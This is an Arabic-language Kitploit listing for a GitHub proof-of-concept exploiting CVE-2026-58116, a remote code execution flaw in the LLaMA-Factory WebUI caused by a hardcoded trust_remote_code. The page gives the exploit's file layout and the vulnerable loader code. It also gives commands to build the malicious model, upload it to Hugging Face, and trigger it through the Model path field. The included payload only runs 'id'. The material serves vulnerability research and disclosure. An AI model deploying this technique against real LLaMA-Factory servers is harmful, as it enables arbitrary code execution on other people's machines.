Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection | Kitploit
أدوات/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبCTFالأوراق والأبحاثالتعلم والتعليمتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-58116 — تنفيذ الأوامر عن بُعد (RCE) في واجهة LLaMA-Factory عبر trust_remote_code

إثبات المفهوم لثغرة CVE-2026-58116 (بدرجة خطورة CVSS 9.8 حرجة): تنفيذ الأوامر عن بُعد في LLaMA-Factory <= v0.9.5.

تُثبّت واجهة LLaMA-Factory قيمة trust_remote_code=True بشكل ثابت في الكود عند تحميل النموذج (src/llamafactory/webui/chatter.py:139 و runner.py:175,320). يمر الحقل «Model path» الذي يتحكم به المهاجم دون أي تحقّق من صحته إلى AutoTokenizer.from_pretrained() / AutoModel.from_pretrained()، لذا تقوم مكتبة transformers من Hugging Face بتنزيل وتنفيذ كود Python عشوائي من مستودع نماذج خبيث.

⚠️ للاستخدام التعليمي فقط

هذا الإثبات (PoC) مخصص للاختبارات الأمنية المصرَّح بها والأغراض التعليمية فقط. الحمولة المرفقة غير ضارة عمدًا (تقوم بطباعة استطلاع المضيف عبر id). لا تشغّلها إلا على أنظمة تملكها أو مصرَّح لك باختبارها. لا تنشر أبدًا حمولة خبيثة على أي بنية تحتية دون إذن صريح.

المحتويات

root@kitploit:~
.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

كيف تعمل نقطة الاستغلال (sink)

تُنشئ مكتبة transformers مثيلًا من كلاس الإعدادات قبل تحميل أي أوزان، لذا يتم تشغيل الحمولة في PoCConfig.__init__ فور قراءة الإعدادات — دون الحاجة إلى وجود أي أوزان. وهذا هو بالضبط المسار الذي تصل إليه LLaMA-Factory عبر src/llamafactory/model/loader.py:

root@kitploit:~
def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

بدء سريع

تحقق من نقطة الاستغلال محليًا (لا حاجة إلى واجهة WebUI — يُثبت العقد الذي تنتهكه الواجهة):

root@kitploit:~
pip install transformers torch
python3 build_and_verify.py

المخرجات المتوقعة — لاحظ أن لافتة الحمولة تظهر أثناء تحميل الإعدادات:

root@kitploit:~
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

اختبار متكامل عبر واجهة LLaMA-Factory قيد التشغيل:

  1. ارفع نموذج الإثبات (PoC) إلى Hub:
    root@kitploit:~
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. شغّل نسخة متأثرة من LLaMA-Factory: llamafactory-cli webui
  3. افتح تبويب Chat، واضبط Model path على your-user/llmfcty-poc، ثم انقر على Load Model.
  4. يتم تنفيذ الحمولة على الخادم بصلاحيات عملية LLaMA-Factory.

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • استشارة VulnCheck: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • الإفصاح الأصلي (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
تنزيل الأداة